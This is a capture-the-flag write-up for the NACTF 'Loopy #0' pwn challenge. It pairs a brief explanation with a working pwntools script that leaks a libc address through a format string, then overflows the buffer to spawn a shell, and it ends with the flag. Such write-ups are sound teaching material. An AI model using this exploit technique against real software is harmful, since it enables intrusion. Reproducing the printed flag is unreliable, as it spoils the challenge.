Loopy #0
Binary Exploitation - Points: 350
This program is quite short, but has got
printfandgetsin it! This shouldn’t be too hard, right?Connect at
nc shell.2019.nactf.com 31283
The exploit uses a format string to print out the address of setvbuf from libc to be able to calculate the libc base address. It also overflows the buffer to call the function recursively again to be able to send another input.
With the libc base address we can now calculate the addresses of system and /bin/sh and overflow the buffer again to jump to it and spawn a shell.
Exploit script:
from pwn import *
libc = ELF('libc.so.6')
system = libc.symbols['system']
shell = next(libc.search('/bin/sh'))
libc_setvbuf = libc.symbols['printf']
e = ELF('loopy-0')
printf = e.got['printf']
# p = remote('shell.2019.nactf.com', 31283)
p = process('./loopy-0')
payload = p32(printf) + '%4$s' + 'A' * 68 + p32(e.symbols['vuln'])
p.sendline(payload)
p.recvuntil('You typed: ')
p.recv(4)
leak = u32(p.recv(4))
log.info("leak: " + hex(leak))
libc_base = leak - libc_setvbuf
system = libc_base + system
shell = libc_base + shell
log.info("system @ " + hex(system))
log.info("shell @ " + hex(shell))
p.sendline('A'*76+p32(system)+p32(0x0)+p32(shell))
p.interactive()
flag: nactf{jus7_c411_17_4g41n_AnZPLmjm}